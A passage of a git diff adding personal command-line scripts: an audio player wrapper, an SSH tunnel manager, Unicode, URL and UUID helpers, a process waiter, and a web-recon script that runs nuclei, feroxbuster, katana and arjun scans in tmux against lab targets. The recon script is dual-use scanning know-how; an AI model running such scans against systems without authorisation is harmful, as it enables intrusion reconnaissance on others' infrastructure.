|
||||
"$@"
|
||||
while [[ "$?" -eq 0 ]]; do
|
||||
sleep 0.5
|
||||
"$@"
|
||||
done
|
||||
16
scripts/tunes
Executable file
16
scripts/tunes
Executable file
|
|
@ -0,0 +1,16 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: tunes
|
||||
# Description: Play audio files with mpv (supports shuffle, playlists, URLs)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: tunes song.mp3
|
||||
# tunes --shuffle ~/music/
|
||||
# tunes https://youtube.com/watch?v=xxxxx
|
||||
|
||||
if ! command -v mpv &>/dev/null; then
|
||||
echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
exec mpv --no-video --ytdl-format=bestaudio "$@"
|
||||
348
scripts/tunnel
Executable file
348
scripts/tunnel
Executable file
|
|
@ -0,0 +1,348 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: tunnel
|
||||
# Description: SSH tunnel manager with saved configurations
|
||||
# Usage: tunnel list # List saved tunnels
|
||||
# tunnel add name user@host:port ... # Add new tunnel config
|
||||
# tunnel start name # Start a saved tunnel
|
||||
# tunnel stop name # Stop a running tunnel
|
||||
# tunnel status # Show active tunnels
|
||||
|
||||
VERSION="1.0.0"
|
||||
TUNNEL_DIR="$HOME/.tunnels"
|
||||
TUNNEL_CONF="$TUNNEL_DIR/tunnels.conf"
|
||||
PID_DIR="$TUNNEL_DIR/pids"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Initialize tunnel directory
|
||||
init_tunnel() {
|
||||
if [[ ! -d "$TUNNEL_DIR" ]]; then
|
||||
mkdir -p "$TUNNEL_DIR" "$PID_DIR"
|
||||
touch "$TUNNEL_CONF"
|
||||
fi
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}tunnel${NC} - SSH Tunnel Manager v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " tunnel <COMMAND> [OPTIONS]"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}list${NC} List all saved tunnels"
|
||||
echo -e " ${CYAN}add NAME SPEC${NC} Add new tunnel configuration"
|
||||
echo -e " ${CYAN}start NAME${NC} Start a saved tunnel"
|
||||
echo -e " ${CYAN}stop NAME${NC} Stop a running tunnel"
|
||||
echo -e " ${CYAN}restart NAME${NC} Restart a tunnel"
|
||||
echo -e " ${CYAN}status${NC} Show active tunnels"
|
||||
echo -e " ${CYAN}delete NAME${NC} Delete saved tunnel"
|
||||
echo -e " ${CYAN}edit NAME${NC} Edit tunnel configuration"
|
||||
echo
|
||||
echo -e "${BOLD}TUNNEL TYPES:${NC}"
|
||||
echo -e " ${YELLOW}Local forward:${NC} -L local_port:remote_host:remote_port"
|
||||
echo -e " ${YELLOW}Remote forward:${NC} -R remote_port:local_host:local_port"
|
||||
echo -e " ${YELLOW}Dynamic (SOCKS):${NC} -D local_port"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " # Forward local port 3000 to remote port 80"
|
||||
echo " tunnel add web user@server.com -L 3000:localhost:80"
|
||||
echo
|
||||
echo " # Expose local port 8080 on remote port 9000"
|
||||
echo " tunnel add reverse user@server.com -R 9000:localhost:8080"
|
||||
echo
|
||||
echo " # SOCKS proxy on local port 1080"
|
||||
echo " tunnel add socks user@server.com -D 1080"
|
||||
echo
|
||||
echo " # Multiple forwards"
|
||||
echo " tunnel add multi user@server.com -L 3000:localhost:80 -L 5432:localhost:5432"
|
||||
echo
|
||||
echo " # Start/stop tunnels"
|
||||
echo " tunnel start web"
|
||||
echo " tunnel stop web"
|
||||
echo " tunnel status"
|
||||
}
|
||||
|
||||
# Add tunnel configuration
|
||||
add_tunnel() {
|
||||
local name="$1"
|
||||
shift
|
||||
local ssh_target="$1"
|
||||
shift
|
||||
local ssh_args="$*"
|
||||
|
||||
if grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Tunnel '$name' already exists"
|
||||
echo "Use: tunnel delete $name (then re-add)"
|
||||
return 1
|
||||
fi
|
||||
|
||||
echo "$name|$ssh_target|$ssh_args" >> "$TUNNEL_CONF"
|
||||
echo -e "${GREEN}✓${NC} Added tunnel: ${BOLD}$name${NC}"
|
||||
echo -e " Target: $ssh_target"
|
||||
echo -e " Args: $ssh_args"
|
||||
}
|
||||
|
||||
# List tunnels
|
||||
list_tunnels() {
|
||||
if [[ ! -f "$TUNNEL_CONF" ]] || [[ ! -s "$TUNNEL_CONF" ]]; then
|
||||
echo -e "${YELLOW}No tunnels configured${NC}"
|
||||
echo "Add one with: tunnel add <name> <user@host> <args>"
|
||||
return 0
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Saved Tunnels:${NC}"
|
||||
echo
|
||||
|
||||
while IFS='|' read -r name target args; do
|
||||
# Check if running
|
||||
pid_file="$PID_DIR/$name.pid"
|
||||
if [[ -f "$pid_file" ]]; then
|
||||
pid=$(cat "$pid_file")
|
||||
if ps -p "$pid" &>/dev/null; then
|
||||
status="${GREEN}●${NC} running"
|
||||
else
|
||||
status="${RED}●${NC} dead"
|
||||
rm -f "$pid_file"
|
||||
fi
|
||||
else
|
||||
status="${YELLOW}○${NC} stopped"
|
||||
fi
|
||||
|
||||
echo -e " [$status] ${BOLD}$name${NC}"
|
||||
echo -e " Target: $target"
|
||||
echo -e " Args: $args"
|
||||
echo
|
||||
done < "$TUNNEL_CONF"
|
||||
}
|
||||
|
||||
# Get tunnel config
|
||||
get_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
if [[ ! -f "$TUNNEL_CONF" ]]; then
|
||||
echo -e "${RED}Error:${NC} No tunnels configured" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
local line=$(grep "^$name|" "$TUNNEL_CONF")
|
||||
if [[ -z "$line" ]]; then
|
||||
echo -e "${RED}Error:${NC} Tunnel '$name' not found" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
echo "$line"
|
||||
}
|
||||
|
||||
# Start tunnel
|
||||
start_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
local config=$(get_tunnel "$name")
|
||||
IFS='|' read -r _ target args <<< "$config"
|
||||
|
||||
pid_file="$PID_DIR/$name.pid"
|
||||
|
||||
# Check if already running
|
||||
if [[ -f "$pid_file" ]]; then
|
||||
pid=$(cat "$pid_file")
|
||||
if ps -p "$pid" &>/dev/null; then
|
||||
echo -e "${YELLOW}⚠${NC} Tunnel '$name' is already running (PID: $pid)"
|
||||
return 0
|
||||
else
|
||||
rm -f "$pid_file"
|
||||
fi
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Starting tunnel: ${BOLD}$name${NC}"
|
||||
echo -e " Target: $target"
|
||||
echo -e " Args: $args"
|
||||
|
||||
# Start SSH tunnel in background
|
||||
ssh -f -N $args "$target" &
|
||||
local pid=$!
|
||||
|
||||
echo "$pid" > "$pid_file"
|
||||
echo -e "${GREEN}✓${NC} Tunnel started (PID: $pid)"
|
||||
}
|
||||
|
||||
# Stop tunnel
|
||||
stop_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
pid_file="$PID_DIR/$name.pid"
|
||||
|
||||
if [[ ! -f "$pid_file" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Tunnel '$name' is not running"
|
||||
return 0
|
||||
fi
|
||||
|
||||
pid=$(cat "$pid_file")
|
||||
|
||||
if ! ps -p "$pid" &>/dev/null; then
|
||||
echo -e "${YELLOW}⚠${NC} Tunnel process not found (stale PID file)"
|
||||
rm -f "$pid_file"
|
||||
return 0
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Stopping tunnel: ${BOLD}$name${NC} (PID: $pid)"
|
||||
kill "$pid" 2>/dev/null || true
|
||||
|
||||
# Wait a moment and verify
|
||||
sleep 1
|
||||
if ps -p "$pid" &>/dev/null; then
|
||||
echo -e "${YELLOW}⚠${NC} Process didn't stop gracefully, using SIGKILL"
|
||||
kill -9 "$pid" 2>/dev/null || true
|
||||
fi
|
||||
|
||||
rm -f "$pid_file"
|
||||
echo -e "${GREEN}✓${NC} Tunnel stopped"
|
||||
}
|
||||
|
||||
# Restart tunnel
|
||||
restart_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Restarting tunnel: ${BOLD}$name${NC}"
|
||||
stop_tunnel "$name"
|
||||
sleep 1
|
||||
start_tunnel "$name"
|
||||
}
|
||||
|
||||
# Show status of all tunnels
|
||||
show_status() {
|
||||
echo -e "${BOLD}${CYAN}Active SSH Tunnels:${NC}"
|
||||
echo
|
||||
|
||||
local found_any=false
|
||||
|
||||
if [[ -f "$TUNNEL_CONF" ]]; then
|
||||
while IFS='|' read -r name target args; do
|
||||
pid_file="$PID_DIR/$name.pid"
|
||||
if [[ -f "$pid_file" ]]; then
|
||||
pid=$(cat "$pid_file")
|
||||
if ps -p "$pid" &>/dev/null; then
|
||||
found_any=true
|
||||
echo -e " ${GREEN}●${NC} ${BOLD}$name${NC} (PID: $pid)"
|
||||
echo -e " $target $args"
|
||||
echo
|
||||
fi
|
||||
fi
|
||||
done < "$TUNNEL_CONF"
|
||||
fi
|
||||
|
||||
if [[ "$found_any" == "false" ]]; then
|
||||
echo -e " ${YELLOW}No active tunnels${NC}"
|
||||
fi
|
||||
}
|
||||
|
||||
# Delete tunnel
|
||||
delete_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
if ! grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Tunnel '$name' not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
# Stop if running
|
||||
pid_file="$PID_DIR/$name.pid"
|
||||
if [[ -f "$pid_file" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Stopping running tunnel first..."
|
||||
stop_tunnel "$name"
|
||||
fi
|
||||
|
||||
# Remove from config
|
||||
sed -i "/^$name|/d" "$TUNNEL_CONF"
|
||||
echo -e "${GREEN}✓${NC} Deleted tunnel: ${BOLD}$name${NC}"
|
||||
}
|
||||
|
||||
# Edit tunnel
|
||||
edit_tunnel() {
|
||||
local name="$1"
|
||||
|
||||
if ! grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Tunnel '$name' not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
"${EDITOR:-vim}" "$TUNNEL_CONF"
|
||||
echo -e "${GREEN}✓${NC} Configuration updated"
|
||||
}
|
||||
|
||||
# Initialize
|
||||
init_tunnel
|
||||
|
||||
# Parse command
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
command="$1"
|
||||
shift
|
||||
|
||||
case "$command" in
|
||||
list|ls)
|
||||
list_tunnels
|
||||
;;
|
||||
add|new)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel add <name> <user@host> <args>"
|
||||
exit 1
|
||||
fi
|
||||
add_tunnel "$@"
|
||||
;;
|
||||
start|up)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel start <name>"
|
||||
exit 1
|
||||
fi
|
||||
start_tunnel "$1"
|
||||
;;
|
||||
stop|down)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel stop <name>"
|
||||
exit 1
|
||||
fi
|
||||
stop_tunnel "$1"
|
||||
;;
|
||||
restart)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel restart <name>"
|
||||
exit 1
|
||||
fi
|
||||
restart_tunnel "$1"
|
||||
;;
|
||||
status|ps)
|
||||
show_status
|
||||
;;
|
||||
delete|del|rm)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel delete <name>"
|
||||
exit 1
|
||||
fi
|
||||
delete_tunnel "$1"
|
||||
;;
|
||||
edit)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: tunnel edit <name>"
|
||||
exit 1
|
||||
fi
|
||||
edit_tunnel "$1"
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $command"
|
||||
echo "Run 'tunnel --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
43
scripts/u+
Executable file
43
scripts/u+
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env python3
|
||||
"""
|
||||
Script Name: u+
|
||||
Description: Unicode character lookup by hex code
|
||||
Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
Usage: u+ 1F4A9 # 💩 PILE OF POO
|
||||
u+ 2665 # ♥ BLACK HEART SUIT
|
||||
u+ 0041 # A LATIN CAPITAL LETTER A
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
import unicodedata
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Look up Unicode character by hex code')
|
||||
parser.add_argument('hex_code', help='Hexadecimal Unicode code point (e.g., 1F600)')
|
||||
args = parser.parse_args()
|
||||
|
||||
try:
|
||||
# Convert hex to int
|
||||
code_point = int(args.hex_code, 16)
|
||||
|
||||
# Get character and name
|
||||
char = chr(code_point)
|
||||
try:
|
||||
name = unicodedata.name(char)
|
||||
except ValueError:
|
||||
name = "<no name available>"
|
||||
|
||||
# Output: character and name
|
||||
print(f"{char} U+{args.hex_code.upper()} {name}")
|
||||
|
||||
except ValueError:
|
||||
print(f"Error: Invalid hex code '{args.hex_code}'", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
except Exception as e:
|
||||
print(f"Error: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
37
scripts/url
Executable file
37
scripts/url
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: url
|
||||
# Description: Parse URLs into component parts
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: url "https://user:pass@example.com:8080/path?query=1#fragment"
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: url <url>" >&2
|
||||
echo "Example: url 'https://example.com:8080/path?key=value#section'" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
echo "original: $url"
|
||||
|
||||
# Parse URL using regex
|
||||
if [[ $url =~ ^([a-z][a-z0-9+.-]*):(//)?(([^:/@]+)(:([^/@]+))?@)?([^/:?#]+)?(:([0-9]+))?(/[^?#]*)?(\\?([^#]*))?(#.*)? ]]; then
|
||||
scheme="${BASH_REMATCH[1]:-}"
|
||||
username="${BASH_REMATCH[4]:-}"
|
||||
password="${BASH_REMATCH[6]:-}"
|
||||
hostname="${BASH_REMATCH[7]:-}"
|
||||
port="${BASH_REMATCH[9]:-}"
|
||||
path="${BASH_REMATCH[10]:-}"
|
||||
query="${BASH_REMATCH[12]:-}"
|
||||
fragment="${BASH_REMATCH[14]:-}"
|
||||
fi
|
||||
|
||||
echo "protocol: ${scheme:-}"
|
||||
[[ -n "${username:-}" ]] && echo "username: $username"
|
||||
[[ -n "${password:-}" ]] && echo "password: $password"
|
||||
[[ -n "${hostname:-}" ]] && echo "hostname: $hostname"
|
||||
[[ -n "${port:-}" ]] && echo "port: $port"
|
||||
[[ -n "${path:-}" ]] && echo "path: $path"
|
||||
[[ -n "${query:-}" ]] && echo "query: ${query#\?}"
|
||||
[[ -n "${fragment:-}" ]] && echo "hash: ${fragment#\#}"
|
||||
37
scripts/uuid
Executable file
37
scripts/uuid
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: uuid
|
||||
# Description: Generate v4 UUID (useful for security testing, tokens, identifiers)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: uuid # generate one UUID
|
||||
# uuid 5 # generate 5 UUIDs
|
||||
# uuid | pbcopy # copy to clipboard
|
||||
|
||||
count=${1:-1}
|
||||
|
||||
# Try multiple methods (in order of preference)
|
||||
generate_uuid() {
|
||||
# Method 1: Python (most portable)
|
||||
if command -v python3 &>/dev/null; then
|
||||
python3 -c 'import uuid; print(uuid.uuid4())'
|
||||
# Method 2: Ruby
|
||||
elif command -v ruby &>/dev/null; then
|
||||
ruby -e "require 'securerandom'; puts SecureRandom.uuid"
|
||||
# Method 3: uuidgen (available on many systems)
|
||||
elif command -v uuidgen &>/dev/null; then
|
||||
uuidgen | tr '[:upper:]' '[:lower:]'
|
||||
# Method 4: /proc/sys/kernel/random/uuid (Linux)
|
||||
elif [[ -r /proc/sys/kernel/random/uuid ]]; then
|
||||
cat /proc/sys/kernel/random/uuid
|
||||
else
|
||||
echo "Error: No UUID generation method available" >&2
|
||||
echo "Install python3, ruby, or uuid-runtime package" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
for ((i=1; i<=count; i++)); do
|
||||
generate_uuid
|
||||
done
|
||||
46
scripts/waitfor
Executable file
46
scripts/waitfor
Executable file
|
|
@ -0,0 +1,46 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: waitfor
|
||||
# Description: Wait for process to complete (useful for automation chains)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: long-running-cmd & waitfor $! # wait for background job
|
||||
# waitfor 1234 # wait for specific PID
|
||||
# waitfor 1234 && notify "Job done!" # chain operations
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: waitfor <PID>" >&2
|
||||
echo "Example: firefox & waitfor \$!" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
pid=$1
|
||||
|
||||
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||
echo "Process $pid not found or already completed" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
|
||||
echo "Waiting for $process_name (PID: $pid) to complete..."
|
||||
|
||||
# Strategy 1: systemd-inhibit (Linux - prevents sleep)
|
||||
if command -v systemd-inhibit &>/dev/null; then
|
||||
systemd-inhibit --what=sleep --who="waitfor" \
|
||||
--why="Waiting for PID $pid ($process_name)" \
|
||||
tail --pid="$pid" -f /dev/null 2>/dev/null
|
||||
# Strategy 2: caffeinate (macOS - prevents sleep)
|
||||
elif command -v caffeinate &>/dev/null; then
|
||||
caffeinate -w "$pid"
|
||||
# Strategy 3: Simple polling (fallback)
|
||||
else
|
||||
tail --pid="$pid" -f /dev/null 2>/dev/null || {
|
||||
# If tail doesn't support --pid, use manual polling
|
||||
while ps -p "$pid" > /dev/null 2>&1; do
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
fi
|
||||
|
||||
echo "✓ Process $pid completed"
|
||||
265
scripts/web-recon.sh.backup-20251030-032335
Executable file
265
scripts/web-recon.sh.backup-20251030-032335
Executable file
|
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: web-recon.sh
|
||||
# Description: Web application reconnaissance with tmux orchestration
|
||||
# Usage: web-recon <url>
|
||||
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)
|
||||
|
||||
VERSION="2.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " web-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
|
||||
echo " - Pane 1 (top-left): nuclei (vulnerability scanner)"
|
||||
echo " - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
|
||||
echo " - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
|
||||
echo " - Pane 4 (bottom-right): live results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " web-recon http://target.htb"
|
||||
echo " web-recon https://example.com"
|
||||
echo " web-recon 10.10.10.5"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./web-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}WORKFLOW:${NC}"
|
||||
echo " - Nuclei & Katana: Run in parallel immediately"
|
||||
echo " - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
|
||||
echo " - httpx: Live monitoring - probes URLs as they're discovered"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Web tools (all optional but warn)
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v feroxbuster &>/dev/null || optional_missing+=("feroxbuster")
|
||||
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||
command -v arjun &>/dev/null || optional_missing+=("arjun")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
feroxbuster) echo " cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
|
||||
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||
arjun) echo " pipx install arjun" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main web-recon function
|
||||
run_web_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Web Application Reconnaissance ║"
|
||||
echo "║ Target: $url"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
WINDOW_NAME="--> Web: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Split into 4 panes with explicit targeting
|
||||
# Layout: 2x2 grid with pipelines and live monitoring
|
||||
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||
# [1: nuclei] [2: feroxbuster → arjun]
|
||||
# [3: katana] [4: live dashboard]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||
# Step 1: split-window -h creates [0:left] [1:right]
|
||||
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||
#
|
||||
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||
|
||||
# Split horizontally first (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split left column vertically
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Split right column vertically (target pane 2 after left split)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||
# 1 (top-left) 2 (top-right)
|
||||
# 3 (bottom-left) 4 (bottom-right)
|
||||
|
||||
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
# (pane 0 disappears during the splitting process)
|
||||
|
||||
# Pane 1 (top-left): nuclei
|
||||
tmux select-pane -t 1
|
||||
if command -v nuclei &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
|
||||
tmux select-pane -t 2
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
# Run feroxbuster, then arjun on discovered URLs
|
||||
if command -v arjun &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||
tmux select-pane -t 3
|
||||
if command -v katana &>/dev/null; then
|
||||
# Full katana with all output formats as originally requested
|
||||
